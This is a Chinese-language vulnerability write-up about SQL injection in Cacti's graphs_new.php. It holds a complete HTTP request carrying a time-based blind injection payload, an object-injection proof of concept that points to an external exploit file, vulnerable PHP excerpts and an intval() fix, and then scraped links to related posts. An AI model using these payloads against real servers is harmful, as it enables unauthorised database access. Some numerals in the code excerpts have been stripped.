catalogue

. 漏洞描述

. 漏洞触发条件

. 漏洞影响范围

. 漏洞代码分析

. 防御方法

. 攻防思考

1. 漏洞描述

other SQL injection vulnerability via graphs_new.php in cacti was found, reported to the bug http://bugs.cacti.net/view.php?id=2652

Relevant Link:

http://bobao.360.cn/snapshot/index?id=146936

2. 漏洞触发条件

0x1: POC1: SQL Inject

POST /cacti/graphs_new.php HTTP/1.1

Host: 192.168.217.133

Proxy-Connection: keep-alive

Cache-Control: max-age=

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://192.168.217.133 [^]

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36

Content-Type: application/x-www-form-urlencoded

DNT: 1

Referer: http://192.168.217.133/cacti/graphs_new.php?host_id=3 [^]

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4

Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; Cacti=j8chtc1ppq4n7viqkbah6c4tv2

Content-Length: 189

__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save

0x2: POC2: Object Inject

. Login

. POST  http://target/cacti/graphs_new.php

   Data: __csrf_magic=sid%3A55c34c49f0a1e4abf5739766855abdfa96fbc91b%2C1448716384&action=save&save_component_new_graphs=&host_id=&selected_graphs_array=[injection]

    {Injection exp can be found on my server: http://pandas.pw/cacti.exp}

. mysql log: select graph_template_id from snmp_query_graph where id= and benchmark(,sha1())--

3. 漏洞影响范围
4. 漏洞代码分析

0x1: Vuls-1: Object Inject To SQL Inject

/graphs_new.php

/* set default action */

if (!isset($_REQUEST["action"])) { $_REQUEST["action"] = ""; }

switch ($_REQUEST["action"]) {

    case 'save':

        //track function form_save

        form_save();

        break;

    case 'query_reload':

        host_reload_query();

        header("Location: graphs_new.php?host_id=" . $_GET["host_id"]);

        break;

    default:

        include_once("./include/top_header.php");

        graphs();

        include_once("./include/bottom_footer.php");

        break;

}

form_save();

function form_save()

{

    ..

    if (isset($_POST["save_component_new_graphs"]))

    {

        //Track function host_new_graphs_save()

        host_new_graphs_save();

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);

    }

}

host_new_graphs_save();

function host_new_graphs_save()

{

    //variable $selected_graphs_array just unserialized the POST variable which we can control without filter.

    $selected_graphs_array = unserialize(stripslashes($_POST["selected_graphs_array"]));

    ..

    //Then the variable goes into a  three-dimensional array , and finally the dirty data we can control enter into the select database query, which caused a SQL injection.

    $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);

    ..

}

0x2: Vuls-2: SQL Injection

function form_save()

{

    if (isset($_POST["save_component_graph"]))

    {

        /* summarize the 'create graph from host template/snmp index' stuff into an array */

        while (list($var, $val) = each($_POST))

        {

            if (preg_match('/^cg_(\d+)$/', $var, $matches))

            {

                $selected_graphs["cg"]{$matches[]}{$matches[]} = true;

            }

            //cg_g is not filtered

            elseif (preg_match('/^cg_g$/', $var))

            {

                if ($_POST["cg_g"] > )

                {

                    $selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true;

                }

            }

            elseif (preg_match('/^sg_(\d+)_([a-f0-9]{32})$/', $var, $matches))

            {

                $selected_graphs["sg"]{$matches[]}{$_POST{"sgg_" . $matches[]}}{$matches[]} = true;

            }

        }

        if (isset($selected_graphs))

        {

            //外部输入参数带入host_new_graphs中

            host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);

            exit;

        }

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);

    }

    if (isset($_POST["save_component_new_graphs"])) {

        host_new_graphs_save();

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);

    }

}

host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);

function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {

    /* we use object buffering on this page to allow redirection to another page if no

    fields are actually drawn */

    ob_start();

    include_once("./include/top_header.php");

    print "<form method='post' action='graphs_new.php'>\n";

    $snmp_query_id = ;

    $num_output_fields = array();

    while (list($form_type, $form_array) = each($selected_graphs_array)) {

        while (list($form_id1, $form_array2) = each($form_array)) {

            if ($form_type == "cg") {

                //sql injection in graph_template_id

                $graph_template_id = $form_id1; 

                html_start_box("<strong>Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "", "center", "");

Relevant Link:

http://seclists.org/fulldisclosure/2015/Dec/att-57/cacti_sqli%281%29.txt

http://bugs.cacti.net/view.php?id=2652

5. 防御方法

/graphs_new.php

function host_new_graphs_save()

{

    ..

    /*$graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);*/

    $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . intval($snmp_query_array["snmp_query_graph_id"]));

    ..

}

/graphs_new.php

function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {

    /* we use object buffering on this page to allow redirection to another page if no

    fields are actually drawn */

    ob_start();

    include_once("./include/top_header.php");

    print "<form method='post' action='graphs_new.php'>\n";

    $snmp_query_id = ;

    $num_output_fields = array();

    while (list($form_type, $form_array) = each($selected_graphs_array)) {

        while (list($form_id1, $form_array2) = each($form_array)) {

            if ($form_type == "cg") {

                //sql injection in graph_template_id

                $graph_template_id = $form_id1;

                /**/

                $graph_template_id = intval($graph_template_id);

                /**/

                html_start_box("<strong>Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "", "center", "");

Relevant Link:

http://www.cacti.net/download_cacti.php

6. 攻防思考

Copyright (c) 2016 Little5ann All rights reserved

Cacti /graphs_new.php SQL Injection Vulnerability的更多相关文章

  1. FlarumChina SQL injection Vulnerability

    First,We need to download our vulnerable program in GitHub links:https://github.com/skywalker512/Fla ...

  2. DRUPAL-PSA-CORE-2014-005 && CVE-2014-3704 Drupal 7.31 SQL Injection Vulnerability /includes/database/database.inc Analysis

    目录 . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Use Drupal to build everything from perso ...

  3. Dede(织梦) CMS SQL Injection Vulnerability

    测试方法: @Sebug.net   dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! # Dede Cms All Versions Sql Vulnerability ...

  4. MyBB 18 SQL Injection Vulnerability

    <?php error_reporting(0); ?> <form method="post" action=""> Input a ...

  5. Zabbix 3.0.3 SQL Injection

    Zabbix version 3.0.3 suffers from a remote SQL injection vulnerability. ============================ ...

  6. Portswigger web security academy:SQL injection

    Portswigger web security academy:SQL injection 目录 Portswigger web security academy:SQL injection SQL ...

  7. CVE: 2014-6271、CVE: 2014-7169 Bash Specially-crafted Environment Variables Code Injection Vulnerability Analysis

    目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 为了理解这个漏 ...

  8. SQL injection

    SQL injection is a code injection technique, used to attack data-driven applications, in which malic ...

  9. ref:Manual SQL injection discovery tips

    ref:https://gerbenjavado.com/manual-sql-injection-discovery-tips/ Manual SQL injection discovery tip ...

随机推荐

  1. Eclipse调试常用技巧(转)

    Eclipse调试常用技巧 转自http://daimojingdeyu.iteye.com/blog/633824 1. 条件断点 断点大家都比较熟悉,在Eclipse Java 编辑区的行头双击就 ...

  2. SignalR与ActiveMQ结合构建实时通信

    一.概述 本教程主要阐释了如何利用SignalR与消息队列的结合,实现不同客户端的交互 SignalR如何和消息队列交互(暂使用ActiveMQ消息队列) SignalR寄宿在web中和其他Signa ...

  3. gravity、layout_gravity及orientation

    gravity.layout_gravity及orientation 最近在弄一个简单的界面:横向,添加一张准备好的背景图,在界面右边居中放置一个按钮.实现过程中发现对布局的主要属性没有想象中地那么熟 ...

  4. LiveSDK初始化/登录时失败的解决办法

    环境描述 Windows 8.1+VS 2013 Update3+Live SDK 5.6 Metro风格的程序,集成LIVE认证 问题描述 如下图,提示Null Reference的异常. 解决办法 ...

  5. 数据库系统原理——ER模型与关系模型

    原文链接: http://blog.csdn.net/haovip123/article/details/21614887 犹记得第一次看<数据库系统原理>时看天书的感觉,云里雾里:现在已 ...

  6. Android开发之AutoCompleteTextView的简单使用

    这里只谈简单的使用: 代码xml: <AutoCompleteTextView android:id="@+id/actv" android:layout_width=&qu ...

  7. Beta版本冲刺———第三天

    会议照片: 项目燃尽图: 1.项目进展: 今天解决的进度:对游戏结束的检测进行了完善,使分数标签和最高分标签的变化更加合理. 仍在进行对排行榜分数变更的实现 2.每个人每天做的事情 郭怡锋:汇总工作进 ...

  8. js 技巧和细节

    1. if中的各种变量返回值 一个值为 true 或者 false 的表达式.如果需要,非 Boolean 表达式也可以被转换为 Boolean 值,但是要遵循下列规则: 所有的对象都被当作 true ...

  9. nginx配置实战1----配置虚拟主机

    1 nginx虚拟主机的概念 虚拟主机是在网络服务器上划分出一定的磁盘空间供用户放置站点.应用组件等,提供必要的站点功能.数据存放和传输功能,所谓虚拟主机,也叫"网站空间",就是把 ...

  10. poj2553 强连通缩点

    The Bottom of a Graph Time Limit: 3000MS   Memory Limit: 65536K Total Submissions: 10114   Accepted: ...